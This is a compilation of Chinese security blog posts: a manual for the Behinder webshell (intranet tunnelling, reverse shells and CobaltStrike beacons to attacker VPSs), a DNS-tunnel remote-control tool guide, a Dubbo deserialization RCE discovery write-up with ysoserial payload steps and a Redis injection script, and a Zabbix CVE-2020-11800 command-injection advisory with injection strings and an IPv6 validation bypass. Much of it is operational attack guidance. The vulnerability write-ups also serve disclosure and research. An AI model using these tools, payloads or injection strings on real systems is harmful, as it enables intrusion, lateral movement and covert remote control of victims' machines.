 完整代码可参考DEMO项目，该项目实现了无回显异步执行用户态shell功能
https://github.com/bigBestWay/cayenne





阅读原文
跳转微信打开



冰蝎v3.0操作使用手册
Fri, 30 Apr 2021 22:08:00 +0800

原创 rebeyond 2021-04-30 22:08 


写在前面近期冰蝎更新了内网穿透模块中的一些功能，有不少朋友不知道参数怎么填，希望能出一个使用指导手册，刚好今









写在前面
近期冰蝎更新了内网穿透模块中的一些功能，有不少朋友不知道参数怎么填，希望能出一个使用指导手册，刚好今天下班赶上五一放假，就借这个机会写一个“说明书”（文中有大量演示动图，请耐心等待加载）。
基本信息
由于冰蝎采用了会话加密，所以客户端首次和服务端通信会有一个协商的过程（v3.0之后的版本不存在密钥协商过程），成功建立连接后，会把服务器侧的一些基本信息，显示在这个Tab页。
命令执行
这里的命令执行提供非交互式的命令执行，常规功能，不再赘述。
虚拟终端
虚拟终端提供一个交互式的真实终端，相当于把服务器侧的Shell给搬到了客户端，在这个Shell里可以执行各种需要交互式的命令，如ssh、mysql：
也可以正常使用vi、vim等命令：
或者top命令：
当然，你也可以直接在里面使用python：
上面是linux环境，windows环境也一样，可以直接使用python，也可以直接使用powershell，如下图：
最后，说明一下，虚拟终端和命令执行不同的是，虚拟终端使用完毕需要点击“停止”按钮来关闭服务器侧的shell进程。
文件管理
常规功能，不再展开描述。
内网穿透
内网穿透模块目前提供了多个穿透方案：
1.基于VPS中转的端口映射；2.基于HTTP隧道的端口映射；3.基于VPS的socks代理映射；4.基于HTTP隧道的socks代理映射；5.反向DMZ映射；
下面分别予以介绍。
基于VPS中转的端口映射
该功能可以直接将目标内网中的某个正在监听的端口映射至VPS，由于是通过VPS中转，所以需要10.211.55.11这台靶机允许出网，以如下网络拓扑为例：
攻击者已在10.211.55.11上上传webshell，想要访问目标内网中10.211.55.9的3389端口，只需要在冰蝎中把10.211.55.9的3389端口转发至VPS（8.8.8.8）上即可，具体操作如下：
首先在vps上使用portmap或者lcx同时监听两个端口：
然后在冰蝎中填上对应的参数：
开启后，VPS上的2222端口会提示收到来自目标网络的链接：
然后链接VPS的3388端口，即可访问目标内网10.10.0.102的3389端口：
基于HTTP隧道的端口映射
如果目标靶机不能出网，冰蝎同样可以复用HTTP端口进行端口映射，把目标端口映射至本机，如下图：
开启后，攻击者本机会开启一个2222端口，如下图：
直接连接127.0.0.1:2222端口即可连接10.211.55.9的3389端口。
基于VPS的socks代理映射
上文都是基于单端口的映射，如果想要访问内网多台机器的多个服务，基于单端口的映射就会需要映射多次，比较麻烦。同样冰蝎提供了两种socks代理的映射。首先介绍基于VPS的socks代理映射，当然前提也是靶机能出网。还是以上文的网络拓扑为例：
首先明确一下目标：我想在10.211.55.11上开设一个socks5代理服务，由于代理服务开在目标内网，我还需要把代理服务端口映射至VPS（8.8.8.8）。
还是需要先在VPS上使用portmap做如下监听：
然后冰蝎做如下配置：
开启后，VPS的2222端口会收到来自靶机的连接，
这时候我们的VPS（8.8.8.8）已经在3388端口上开启了一个socks5的服务端口，然后本地使用socks5代理客户端做一下配置，此处我使用系统自带的proxychains做示例，配置如下：
这时候，通过proxychains即可访问到目标内网，比如我们想访问10.211.55.11的web服务，边可以直接proxychains curl http://10.211.55.11/test.txt：
基于HTTP隧道的socks代理映射
当靶机无法外连时，就需要通过HTTP隧道把内网的socks服务端口转发出来，冰蝎做如下配置：
开启后，攻击者本机会监听2222端口，并在此端口上开启Socks5代理服务，修改proxychains的配置文件，设置socks服务器为127.0.0.1:2222：
使用proxychains访问10.211.55.9和10.211.55.11的web服务，如下：
反向DMZ映射
反向DMZ映射是将攻击者本地网络（或者公网VPS）中的某个监听端口映射至目标网络中，适用于目标网络不出网，但是又需要目标网络回连的情况，此处列举如下四种场景：
1.已拿到10.211.55.11的webshell，最终目标为10.211.55.9，可以通过某漏洞实现在10.211.55.9上的RCE。10.211.55.11和10.211.55.9都不能出网，但是我又想使用CobaltStrike来操作这台机器，这时候就可以把CobaltStrike服务器（例如8.8.8.8）的监听端口（例如5538）映射至10.211.55.11上，然后CobaltStrike木马的回连地址设置为10.211.55.11:5538。木马运行后，会回连10.211.55.11:5538，冰蝎会把10.211.55.11:5538的流量转发至真正的CobaltStrike服务器（8.8.8.8）。
网络拓扑如下：

2.  攻击者机器处于内网，地址为192.168.0.1，CobaltStrike服务器部署在192.168.0.100。已拿到目标网络10.211.55.11的webshell，最终目标为10.211.55.9，可以通过某漏洞实现在10.211.55.9上的RCE。10.211.55.11和10.211.55.9都不能出网，但是我又想使用CobaltStrike来操作这台机器，这时候就可以把CobaltStrike服务器（例如192.168.0.100）的监听端口（例如5538）映射至10.211.55.11上，然后CobaltStrike木马的回连地址设置为10.211.55.11:5538。木马运行后，会回连10.211.55.11:5538，冰蝎会把10.211.55.11:5538的流量转发至真正的CobaltStrike服务器（192.168.0.100）。
网络拓扑如下：
3. 已拿到10.211.55.11的webshell，最终目标为10.211.55.9，10.211.55.11和10.211.55.9都不能出网，10.211.55.9存在ms17-010漏洞，漏洞exp需要反弹shell，这时候就可以在VPS（8.8.8.8）上监听4444端口，然后把4444端口映射至10.211.55.11:4444，然后ms17-010的exp回连地址设置为10.211.55.11:4444，即可让exp回连至8.8.8.8:4444。
4. 攻击者机器处于内网，地址为192.168.0.1，已拿到10.211.55.11的webshell，最终目标为10.211.55.9，10.211.55.11和10.211.55.9都不能出网，10.211.55.9存在ms17-010漏洞，漏洞exp需要反弹shell，这时候就可以在攻击者本地（192.168.0.1）上监听4444端口，然后把4444端口映射至10.211.55.11:4444，然后ms17-010的exp回连地址设置为10.211.55.11:4444，即可让exp回连至192.168.0.1:4444。
接下来我们以第1种场景为例，来做一下演示：
首先在VPS上启动CobaltStrike Server，如下图：
然后在冰蝎中做如下配置：
“监听IP地址中”填写CobaltStrike服务器的外网IP地址，开启。此时可以看到webshell所在机器已经开始监听5538端口：
然后我们配置一个cs木马，回连地址设置为10.211.55.11，生成artifact.exe，通过psexec在10.211.55.9上执行，成功上线：
整个过程中，10.211.55.9和10.211.55.11没有与外网新建TCP连接。
反弹Shell
冰蝎在v1.0版本即提供了一键反弹shell和反弹meterpreter的功能，在v3.0中新增了一键反弹CobaltStrike。
普通Shell
反弹至公网VPS
冰蝎做如下配置：
IP地址中填入VPS公网地址，然后在VPS上nc监听9090端口（当然也可以使用msfconsole来代替nc，msfconsole更稳定一些，功能也更丰富）：
当然这是目标能出网的情况下，如果目标不能出网是不是就不能反弹shell至公网VPS了呢？答案是也可以反弹。只需要勾选“目标不出网”复选框，即可：
冰蝎后台会通过HTTPS隧道技术将shell反弹至公网VPS：
反弹shell会话已经建立，可以看到10.211.55.11上并没有到VPS的网络连接：
反弹至本地
当然如果你没有VPS，也可以直接将shell反弹至本地，冰蝎会通过复用HTTP信道将shell反弹至本地机器，IP地址只要填写127.0.0.1即可，如下：
来张动图：
当“IP地址”为127.0.0.1时，是否勾选“目标不出网”复选框没有区别。
反弹至本地局域网
当目标不出网时，可以降shell反弹至攻击者本机所在局域网中的其他机器，IP地址直接填内网地址（如192.168.0.100）即可，需要勾选“目标不出网”复选框。
Metepreter
反弹至公网VPS
Metepreter的反弹和Shell类似，此处不再赘述，参数配置如下，其中msfconsole中相关的命令冰蝎已在提示框中给出示例，建议直接复制，避免写错payload导致上线异常：
反弹至本地
参数配置如下：
反弹至本地局域网
当目标不出网时，可以降Metepreter反弹至攻击者本机所在局域网中的其他机器，IP地址直接填内网地址（如192.168.0.100）即可，需要勾选“目标不出网”复选框。
CobaltStrike
冰蝎支持Java和Aspx版本的CobaltStrike一键上线功能，采用windows/beacon_https/reverse_https上线方式。因为冰蝎采用注入JVM进程方式来植入代码，如果需要退出CobaltStrike会话，需先将CobaltStrike会话迁移至其他进程再退出，避免JVM进程停止。同样，CobaltStrike的一键上线也提供了两种方式，目标出网的情况下，可以直接上线至公网VPS，目标不出网的情况下，可以上线至攻击者本机CS Server或者攻击者本地局域网中的CobaltStrike Server。
上线至公网VPS
如需将目标上线至部署于VPS的CobaltStrike Server，“连接信息”中的“IP地址”直接填VPS的IP地址，如下：
成功上线：
上线至本地
如果CobaltStrike Server搭建在本机，直接在“连接信息”中的“IP地址”栏填入“127.0.0.1”即可上线至本地。
上线至本地局域网
当目标不出网时，可以降CobaltStrike上线至攻击者本机所在局域网中的其他机器，IP地址直接填内网地址（如192.168.0.100）即可，需要勾选“目标不出网”复选框。
数据库管理
数据库管理属于常规功能，目前支持SQL Server、MySQL、Oracle，当服务器环境为Java或者C#时，如果缺少对应的数据库管理库，冰蝎会自动上传并加载对应的库文件。
另外，如果数据库连接密码中有特殊字符（如@符号），用URL编码一下即可（@编码之后为40%）。
自定义代码
冰蝎提供asp、c#、php、Java的自定义代码执行功能，文本框支持语法高亮，c#和Java会把输入的源代码自动编译并执行。
平行空间
该模块正在进行不同环境的适配，预计在v3.0正式版中启用。
扩展功能
该模块正在进行不同环境的适配，预计在v3.0正式版中启用。
备忘录
备忘录模块提供对当前shell的一些临时文本信息进行存储。直接输入内容即可，冰蝎会自动保存。
更新信息
该模块展示冰蝎的更新日志、使用交流群二维码等，同时会不定期发布server端的一些免杀版本。
内存马注入
冰蝎采用基于Agent技术的Java内存马注入功能，目前支持Tomcat、Weblogic、Jboss。其中Tomcat和Jboss对内存马注入路径没有任何限制。Weblogic的内存马注入路径需要在真实存在的应用名称的路径下，比如http://xxx.com:7001/console/memshell，console即为应用名称不能直接注入到http://xxx.com:7001/memshell。
另外，冰蝎还提供了内存马防检测功能，该功能会阻止其他Agent注入进当前JVM进程。当然注入内存马的时候如果开启该功能，冰蝎后续也无法再次注入内存马。
小结
最初，我只是重写了几个版本的一句话木马（因为在冰蝎之前没有真正实现eval效果的Java一句话木马），同时提出了一套理论，用来绕过流量型防护设备，顺便写了个demo用来验证上述理论的效果。所以冰蝎这个客户端只是理论的一个衍生品，不过后来用的小伙伴比较多，我就继续把这个客户端更新了下去，希望大家不要太关注工具本身，而是能更多的去在理论上做一些创新。最后祝大家五一玩的开心。





阅读原文
跳转微信打开



教你实现自己的DNS隧道远控
Tue, 05 Jan 2021 11:34:00 +0800

原创 游望之 2021-01-05 11:34 











序
DNS隧道，通过设置NS记录和A记录控制子域名解析到我们指定的公网IP服务器地址，进而躲避内网日志监控系统、穿透内网的防火墙策略进行传输数据、远程控制，毕竟DNS查询请求与响应是众多服务都需要的基础功能，防火墙大多不会禁止。其基础知识本文不做详细介绍，读者可自行搜索。
程序设计
DNS远控分为client和server两端，client放置到内网靶机，接收并执行server的命令。server运行在公网VPS上，下发命令、收取数据和会话管理。
如何使用DNS协议传送有效载荷
已有的DNS隧道软件通常会使用A记录和Mail Exchange查询响应来携带数据，这里我选用更隐蔽的DNSSEC安全扩展中的Resource Record类型
client -> server: query DNSKEY, accept DNSSEC security RRsserver -> client: answer DNSKEY, publickey 可用来传输数据

一个真实DNS请求
Frame 99: 120 bytes on wire (960 bits), 120 bytes captured (960 bits) on interface \Device\NPF_{BC6B3107-2D7F-490A-963C-710BA04C6854}, id 0Ethernet II, Src: VMware_a2:2c:80 (00:0c:29:a2:2c:80), Dst: VMware_f6:9c:9e (00:50:56:f6:9c:9e)Internet Protocol Version 4, Src: 192.168.122.130, Dst: 192.168.122.2User Datagram Protocol, Src Port: 38569, Dst Port: 53Domain Name System (query)    Transaction ID: 0x32e9    Flags: 0x0100 Standard query    Questions: 1    Answer RRs: 0    Authority RRs: 0    Additional RRs: 1    Queries        jXD/Bv8AAAAMSEFMTxxKAABf8s5i.1.xxx.website: type DNSKEY, class IN            Name: jXD/Bv8AAAAMSEFMTxxKAABf8s5i.1.xxx.website            [Name Length: 49]            [Label Count: 4]            Type: DNSKEY (DNS Public Key) (48)            Class: IN (0x0001)    Additional records        : type OPT            Name:             Type: OPT (41)            UDP payload size: 4096            Higher bits in extended RCODE: 0x00            EDNS0 version: 0            Z: 0x8000                1... .... .... .... = DO bit: Accepts DNSSEC security RRs                .000 0000 0000 0000 = Reserved: 0x0000            Data length: 0    [Response In: 100]

client发送给server的数据还是存放在query的name字符串中，域名中的每一个标签（逗号分隔）限制最大长度为63字节，整个域名的长度不超过255字节。这里是
jXD/Bv8AAAAMSEFMTxxKAABf8s5i.1.xxx.website

jXD/Bv8AAAAMSEFMTxxKAABf8s5i就是要传送的数据了，是经过base64编码的，编码后最大63字节，那也就是说明文最大45字节，即client一个请求只能最多携带45字节数据到server。而server->client即DNS响应使用publickey传输数据，可传输最多437字节（实际测试得出）。该请求的响应如下：
Frame 100: 189 bytes on wire (1512 bits), 189 bytes captured (1512 bits) on interface \Device\NPF_{BC6B3107-2D7F-490A-963C-710BA04C6854}, id 0Ethernet II, Src: VMware_f6:9c:9e (00:50:56:f6:9c:9e), Dst: VMware_a2:2c:80 (00:0c:29:a2:2c:80)Internet Protocol Version 4, Src: 192.168.122.2, Dst: 192.168.122.130User Datagram Protocol, Src Port: 53, Dst Port: 38569Domain Name System (response)    Transaction ID: 0x32e9    Flags: 0x8180 Standard query response, No error    Questions: 1    Answer RRs: 1    Authority RRs: 0    Additional RRs: 0    Queries        jXD/Bv8AAAAMSEFMTxxKAABf8s5i.1.xxx.website: type DNSKEY, class IN            Name: jXD/Bv8AAAAMSEFMTxxKAABf8s5i.1.xxx.website            [Name Length: 49]            [Label Count: 4]            Type: DNSKEY (DNS Public Key) (48)            Class: IN (0x0001)    Answers        jXD/Bv8AAAAMSEFMTxxKAABf8s5i.1.xxx.website: type DNSKEY, class IN            Name: jXD/Bv8AAAAMSEFMTxxKAABf8s5i.1.xxx.website            Type: DNSKEY (DNS Public Key) (48)            Class: IN (0x0001)            Time to live: 5 (5 seconds)            Data length: 68            Flags: 0x0100            Protocol: 3            Algorithm: RSA/SHA1 + NSEC3/SHA1 (7)            [Key id: 942]            Public Key: 46384f4b017aea00000000007778722d78722d78203120726f6f7420726f6f7420202031…    [Request In: 99]    [Time: 0.054413000 seconds]

可靠传输
传统的DNS服务监听的是UDP端口，那么剩下的工作就是如何在DNS协议之上实现一个类似TCP的可靠传输协议，涉及到分包组包、重传等细节。包头设计：
struct FragmentCtrl{    unsigned short end:1;    unsigned short seqId:15;    unsigned short clientID;};
15 bit作为循环序号，1 bit作为是否最后一个分片标识，2 byte作为会话id区分来自不同靶机的会话。发送时采用比较简单的停等协议，client在每一个请求中都带有序列号，server在接收之后要回复ack，client只有等到当前包的ack之后才会发送下一个包，如果超时未收到ack则重传，重复此过程直到所有分片都传输完成。
命令下发
传输层可靠实现之后，就要实现应用层的协议了，client定时询问server是否有命令要执行
client->server: Hello?server->client: 没事(隔1秒)client->server: Hello?server->client: 没事(隔1秒)client->server: Hello?server->client: getuidclient->server: uid=0(root) gid=0(root)
更详细的实现可以参考代码和抓包分析。

项目介绍
https://github.com/bigBestWay/dnstunnel
 C语言编写，适用于LINUX系统
编译
./build.sh
域名配置
使用者需要在域名服务做如下配置(以gandi.net为例):
添加一条A记录:
ns1 10800 IN A 55.55.55.55
再添加一条NS记录:
1 1800 IN NS ns1.test.website.
使用说明
按照以上添加后, 在55.55.55.55上启动NDNS_server
./NDNS_server
在靶机上带参数启动NDNS_client
./NDNS_client .1.test.website
用户界面
支持如下命令
session <list|clientid>getuidupload <local> <remote>download <remote> <local>bash <shell cmd>move <src> <dst>mkdir <dir>rmdir <dir>rename <old> <new>listrm <file>cd <dir>pwdhostipSession[29727]>>
session
session list
列出当前所有会话
session clientid
切换到对应会话
getuid
getuid
获取当前远程会话的用户ID
upload
upload aaa bbb

将本地文件aaa上传到远程会话机器bbb，限制文件aaa压缩后要小于430字节
download
download aaa bbb

将远程文件aaa下载到本地为bbb，下载速率大概20-30字节/秒，所以千万不要下载大文件，否则耗时超级长
bash
bash which python
可执行任意shell命令，注意不要执行需要交互的命令
move
move <src> <dst>
和mv功能一致，暂未实现，可能用处很少
mkdir
mkdir aaa
在远端创建文件夹aaa
rmdir
删除远端文件夹
rename
重命令文件
list
list
在远端程序当前目录执行ls -lrt并返回结果
rm
删除远端文件
cd
切换远端程序当前目录
pwd
获取远端程序当前目录
hostip
获取远端机器的出口ip和主机名
TODO
Beta版本还未经过很多测试，很多地方都可以改进，比如client daemonlize、无限fork躲避查杀、流量加密、停等协议改成滑动窗口等。





阅读原文
跳转微信打开



Dubbo多个远程代码执行漏洞
Thu, 24 Dec 2020 17:17:00 +0800

rebeyond 2020-12-24 17:17 












马上年底了，发现年初定的几个漏洞的KPI还没来得及完成，趁着最近有空赶紧突击一波，之前业务部门被爆过Dubbo的漏洞，干脆就把Dubbo拖过来挖一把。之前没用过Dubbo，既然要挖它就先大体了解了一下，毕竟know it and then hack it。Dubbo是个基于Java的RPC框架，可以实现Java过程的远程调用。话不多说，先本地搞个Demo跑起来看看，Dubbo版本就采用最新的2.7.8

一、本地Demo
先从Git地址
https://github.com/apache/dubbo-samples上下载示例项目，里面有几十个示例，我们随意选取一个dubbo-samples-http，后续以该示例为基础进行Demo开发与漏洞调试。此处示例项目的导入、基本配置、启动、运行步骤不再赘述。

1、创建Provider
Provider可以理解为服务端，我们创建如下Provider：
public interface DemoService {    String sayHello(String name);}public class DemoServiceImpl implements DemoService {
    @Override    public String sayHello(String name) {        System.out.println("[" + newSimpleDateFormat("HH:mm:ss").format(newDate()) + "] Hello " + name + ", request from consumer: " + RpcContext.getContext().getRemoteAddress());        return"Hello " + name + ", response from provider: " + RpcContext.getContext().getLocalAddress();    }}

该Provider只提供了一个sayHello方法，该方法接受一个string类型参数，启动Provider，如下图：

2、创建Consumer
Consumer可以理解为客户端，我们创建如下Consumer：
public class HttpConsumer {
    public static void main(String[] args) throwsException {       ClassPathXmlApplicationContext context = newClassPathXmlApplicationContext("spring/http-consumer.xml");        context.start();
        DemoServicedemoService = (DemoService) context.getBean("demoService");        System.out.println(demoService.sayHello("rebeyond"));    }
运行Consumer，如下图：

Provider的输出：

可以看到Consumer成功调用了Provider端提供的sayhello方法，Demo运行成功。

二、历史漏洞
Demo搭建好以后我们对dubbo的大体工作流程就有了一个比较完整的轮廓了，接下来就是思考攻击面，简单头脑风暴了一下想到了几个关键词：RPC、反射、反序列化、远程代码执行、攻击客户端、攻击服务端。以史为镜，可以知兴替，头脑风暴之后，我们简单看下Dubbo之前爆过的几个高危漏洞。

1、CVE-2019-17564
先来看一下漏洞描述：“Apache Dubbo支持多种协议，官方默认为 Dubbo 协议。当用户选择http协议进行通信时，Apache Dubbo 将接受来自消费者远程调用的POST请求并执行一个反序列化的操作。由于此步骤没有任何安全校验，因此可以造成反序列化执行任意代码。”
通过描述可以看出，这是一个简单粗暴的反序列化漏洞，当客户端和服务端的通信采用http协议时，服务端直接对POST过来的二进制数据流进行Java原生反序列化，因此可以根据项目依赖的一些第三方库来构造Gadgets实现RCE。
这个漏洞的修复方案也是比较简单直接，直接把POST请求体的handler由“Java原生反序列化”改为“JsonRpcServer”。

2、CVE-2020-1948
漏洞描述：“Dubbo 2.7.6或更低版本采用的默认反序列化方式存在代码执行漏洞，当 Dubbo 服务端暴露时(默认端口：20880)，攻击者可以发送未经验证的服务名或方法名的RPC请求，同时配合附加恶意的参数负载。当恶意参数被反序列化时，它将执行恶意代码。经验证该反序列化漏洞需要服务端存在可以被利用的第三方库，而研究发现极大多数开发者都会使用的某些第三方库存在能够利用的攻击链，攻击者可以利用它们直接对 Dubbo 服务端进行恶意代码执行，影响广泛。”
可以看到，这也是一个反序列化漏洞。这个漏洞的修复方案主要是增加了一个getInvocationWithoutData方法，对恶意的inv对象进行了一个置空操作：


了解完上面这两个已知漏洞，接下来我们就开始挖新洞了：）

三、Dubbo Redis协议远程代码执行漏洞
上文提到，Apache Dubbo支持多种协议，列表如下：

不同的协议是不同的入口分支，我们选择redis协议跟一下，首先改造一下我们的Demo，改成redis协议的版本，Provider做如下修改，根据官网的文档，我们增加get和set方法：
public interface DemoService {    String sayHello(String name);    String get(String key);    String set(String key,Object value);}public class HttpProvider {
    public static void main(String[] args) throwsException {       ClassPathXmlApplicationContext context = newClassPathXmlApplicationContext("spring/http-provider.xml");        context.start();
        System.out.println("dubbo service started");       RegistryFactory registryFactory = ExtensionLoader.getExtensionLoader(RegistryFactory.class).getAdaptiveExtension();        Registry registry =registryFactory.getRegistry(URL.valueOf("zookeeper://121.37.161.179:2181"));        registry.register(URL.valueOf("redis://192.168.176.2/org.apache.dubbo.samples.http.api.DemoService?category=providers&dynamic=true&application=http-provider&group=member&loadbalance=consistenthash"));                newCountDownLatch(1).await();    }
}
Consumer做如下修改：
public class HttpConsumer {
    public static void main(String[] args) throwsException {       ClassPathXmlApplicationContext context = newClassPathXmlApplicationContext("spring/http-consumer.xml");        context.start();
        DemoServicedemoService = (DemoService) context.getBean("demoService");        String result = demoService.get("rebeyond");    }}
程序执行流程为：Consumer向Provider请求demoService的引用，这个引用其实就是个redis服务，然后执行demoService的get方法去redis里面取数据。
定位到redis协议的实现代码
org.apache.dubbo.rpc.protocol.redis.RedisProtocol，如下：

可以看到红框里面在处理set方法时，没有像memcached那样调用原生jedis client的get方法，而是将key的内容作为字节流的形式读取出来并进行了反序列化处理。不过这里负责反序列化的是ObjectInput接口，由于这个接口的实现类比较多，要实际看一下具体是哪个实现类执行的反序列化操作，下断点跟进去看一下：

可以看到oin的类型是JavaObjectInput，JavaObjectInput是dubbo对Java原生ObjectInputStream的一个简单封装，继续跟进oin.readObject：

直接调用了java.io.ObjectInputStream中的readObject方法来反序列化，没有任何过滤。不过这里要注意一下，我们在构造payload的时候，需要绕过下面这个小坑：
byte b =getObjectInputStream().readByte();if (b == 0) {    return null;}
后面我们在构造payload的时候，需要在恶意反序列化对象的字节码之前先放一个字节的0数据，才能绕过上面这个校验。
接下来就是构造payload，我在复现历史漏洞的时候看到CVE-2019-17564中利用的是CommonCollections4.0的Gadgets，我们也采用这个链来构造Poc，在生成Poc之前，为了使Poc绕过前面那个坑，需要先对ysoserial.jar做一个简单的改造，如下：
public static void serialize(final Object obj, final OutputStream out) throws IOException {    final ObjectOutputStream objOut = new ObjectOutputStream(out);   objOut.writeByte(1);  //add thisline to control the execution flow to subsequent deserialization in dubbo   objOut.writeObject(obj);}
重新构建ysoserial.jar后执行如下命令生成payload：
java8 -jar ysoserial.jarCommonsCollections4 "open /System/Applications/Calculator.app"
把payload写入redis：
#!/bin/python#coding=utf-8
import redis,binasciir = redis.StrictRedis(host='192.168.176.2', port=6379, db=0)payload=open('/tmp/payload','rb').read()printbinascii.b2a_hex(payload)r.set('rebeyond', payload)

运行Consumer，payload成功执行：

根据官网文档可知，dubbo不提供redis协议服务的导出，只提供redis协议服务的引用，因此这个漏洞的攻击场景主要用于内网横向移动，当控制了内网一台redis后，批量获取dubbo client主机的权限。

四、Dubbo callback远程代码执行漏洞
打完client不够过瘾，接下来继续打server。
Dubbo推荐的默认通信协议是dubbo协议，下面我们就分析下dubbo协议的入口处理类DubboProtocol，经过一波我注意到如下代码：

这段代码有两个问题，第一个问题在于logger.warn，我们先看另外一处调用logger.warn的代码：
可以看到，Dubbo在其他地方调用logger.warn的时候都会事先通过isWarnEnabled函数判断下有没有开启log，但是137行这里没有判断，直接无条件执行了logger.warn。
第二个问题在于，这里的inv对象没有通过getInvocationWithoutData方法进行清洗。这两个问题构成了一个漏洞前提，前提有了，下面的问题是怎么控制程序走到这个分支里面。

从上图代码可以看出核心的分支控制点在于
inv.getObjectAttachments().get(ISCALLBACKSERVICEINVOKE)的值，只有当inv.getObjectAttachments().get(ISCALLBACKSERVICEINVOKE)的值为true的时候，才能执行进入这个问题分支。根据CallBack这个关键词，我了解了一下Dubbo执行回调机制，也就是说Consumer在远程调用Provider的方法时，也可以让Provider回过来调用Consumer的方法，这个过程就是回调。我对Demo重新改造一下，做了个callback的版本，Provider侧如下：
public interface CallbackService {
    /**     *这个索引为1的是callback类型。     * dubbo 将基于长连接生成反向代理，就可以在服务端调用客户端逻辑     * @param key     *@param listener     */    void addListener(String key, CallbackListenerlistener);}public class CallbackServiceImpl implements CallbackService {
    private finalMap<String, CallbackListener>listeners;
    public CallbackServiceImpl() {        listeners =newConcurrentHashMap<>();        Thread t = newThread(() -> {            while (true) {                try {                   for (Map.Entry<String, CallbackListener>entry : listeners.entrySet()) {                       try {                            entry.getValue().changed(getChanged(entry.getKey()));                       } catch (Throwable t1) {                            listeners.remove(entry.getKey());                       }                   }                   Thread.sleep(5000); // timely trigger change event                } catch (Throwable t1) {                   t1.printStackTrace();                }            }        });        t.setDaemon(true);        t.start();    }
    @Override    public void addListener(String key, CallbackListener listener){        listeners.put(key, listener);        listener.changed(getChanged(key)); // send notification for change    }
    private String get Changed(String key) {        return"Changed: " + newSimpleDateFormat("yyyy-MM-dd HH:mm:ss").format(newDate());    }}
Consumer侧：
public class HttpConsumer {
    public static void main(String[] args) throwsException {       ClassPathXmlApplicationContext context = newClassPathXmlApplicationContext("spring/http-consumer.xml");        context.start();
       CallbackService callbackService = context.getBean("callbackService",CallbackService.class);        // 增加listener       callbackService.addListener("foo.bar", newCallBackDemo());    }
    static class CallBackDemo implements CallbackListener {
        @Override        public void changed(String msg) {            System.out.println("I am callback:" + msg);        }    }}
Demo运行结果如下，Provider成功回调了Consumer的changed方法：

因为Dubbo的Provider和Consumer共用同一套Dubbo的代码，在问题代码处打断点，然后同时运行Provider和Consumer，果然不出意外，Provider没有断下来，Consumer断下来了：

由此可知这个漏洞分支只有机会在Consumer侧执行，这个也是意料之中，对Dubbo来说，Consumer调用Provider是正常调用，Provider反过来调用Consumer才叫“回调”，因此Dubbo的流程只存在Provider回调Consumer，不存在Consumer回调Provider。但是我们的目标是Provider，所以需要让Provider把某个正常调用强制作为“回调”。如何判断一个请求是“正调”还是“回调”？前文已经提到，就是
inv.getObjectAttachments().get(ISCALLBACKSERVICEINVOKE)的值为true的时候，即attachments中的isCallBackServiceInvoke值为true的时候。
接下来的目标就是要在Provider侧寻找一个分支，可以改写inv的attachments，尝试在源码中寻找如下调用点：

找了一圈没发现key和value同时可控的点，暂时陷入僵局，准备从其他思路突破，再次运行一下callback的Demo并抓包：

上面的数据流，红色是Consumer发给Provider的，蓝色是Provider返回给Consumer的。当我看到syscallbackarg-1字样的时候，顿时豁然开朗了，之前客户端的断点中，attachments中有一个key就是syscallbackarg-1，也就是说，attachments是用户可控的，经过一波分析，最终定位到Provider侧的如下代码段：

赶紧模拟客户端，在上面那个数据包的基础上，往里塞一个键值对："_isCallBackServiceInvoke"："true"，在Provider侧上图红框处打上断点，成功断了下来：

F8步过，可以看到"_isCallBackServiceInvoke"："true"被成功注入：

第一个分支搞定以后，我们再看一下这段代码：

还需要搞定一个分支，那就是hasMethod的值必须是false。

但是这里methodStr和inv.getMethodName()都是addListener，这里的methodStr是Provider根据Consumer请求体中指定的接口名称来反射获取的，而inv.getMethodName()的值是用户可控的，这两部分如下：

尝试将第一个红框的方法名随意改一下，结果发现在请求体decode的时候就报方法不存在的异常，根本走不到构建attachments的流程。这时候只有一个方法，那就是第一个红框中的接口名和方法名同时修改成一个classpath中确实存在的值，并且这个方法还必须要接受一个Object类型的参数方便后续通过参数注入恶意对象，很自然想到我们可以用Dubbo自带的几个默认Service，比如EchoService，这个服务的$echo方法刚好接收一个Object类型参数：

这样最终methodStr和inv.getMethodName()就分别是addListener和$echo，hasMethod自然为false，成功进入我们想要的漏洞分支：


接下来就是构造inv对象了，参考CVE-2020-1948，这里我们也采用com.sun.rowset.JdbcRowSetImpl和ToStringBean来构造Gadgets，
最终成功执行Payload：


五、小结
这篇文章主要是给大家分享一下自己的挖洞思路，由于时间很仓促，上文中的一些理解可能存在错误，如有不当之处，希望各位斧正。
 
六、参考链接
1.http://dubbo.apache.org/docs/v2.7/user/references/protocol/
2.https://paper.seebug.org/1264/
3.https://www.cnblogs.com/wh4am1/p/12307848.html





阅读原文
跳转微信打开



【原创漏洞】CVE-2020-11800 Zabbix远程代码执行漏洞
Thu, 17 Dec 2020 14:37:00 +0800

原创 游望之 2020-12-17 14:37 


Zabbix Server的trapper命令处理，存在命令注入漏洞，可导致远程代码执行。









漏洞描述
 
Zabbix Server的trapper命令处理，存在命令注入漏洞，可导致远程代码执行。
 
 
漏洞影响
 
远程代码执行
 
CVSSv3 Score
 
9.0 -CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H
 
AC: HIGH 需要服务端配置开启自动注册，或者Zabbix Proxy（会认证主机名）自动发现。


影响版本
 
Zabbix 3.0.x~3.0.30
 
https://www.zabbix.com/cn/download?zabbix=3.0
 
 
漏洞分析
 
该漏洞原理与CVE-2017-2824相同，参考：
https://talosintelligence.com/reports/TALOS-2017-0325
active checks是自动注册的命令字，自动注册的本意是agent可主动将主机注册给server进行监控，在2.2.18版本中可以在IP中注入（参见上文的版本分析处，2.2.19版本才增加了ip校验）shell命令。CVE-2017-2824提到的漏洞在discoverydata命令字即自动发现功能中，由于没有校验IP，导致可在IP中写入shell命令，进而在执行scriptcmd时达到命令注入。比如在IP中写入内容
 
;touch /tmp/zabbix_pwned
 
 
那么执行ping命令时就变为
 
 
/bin/ping -c 3 ;touch /tmp/zabbix_pwned 2>&1

 
 
CVE-2017-2824在3.0.x的修复办法是，对IP进行校验，代码如下：
但是校验IP的方法可以被绕过，Ipv4校验没问题，ipv6校验可绕过:
输入为ffff:::;touch/tmp/1234pwn即可绕过，进而实现命令注入。

漏洞复现
添加自动注册规则
 
访问portal登录，依次点击菜单Configuration->Actions，将Event source调整为Autoregistration
点击Create action后，第一个页签随便写一个名字
第二个页签设置条件

可配置host name、proxy和host metadata包含或不包含某个关键字，为了复现方便这里留空。
 
第三个页签，指定操作，可以为发送消息、添加主机等，这里要选择Addhost。
以上规则的意思就是任意自动注册的host，没有任何拒绝规则，都会直接添加到server中。
 
注册host
 
 
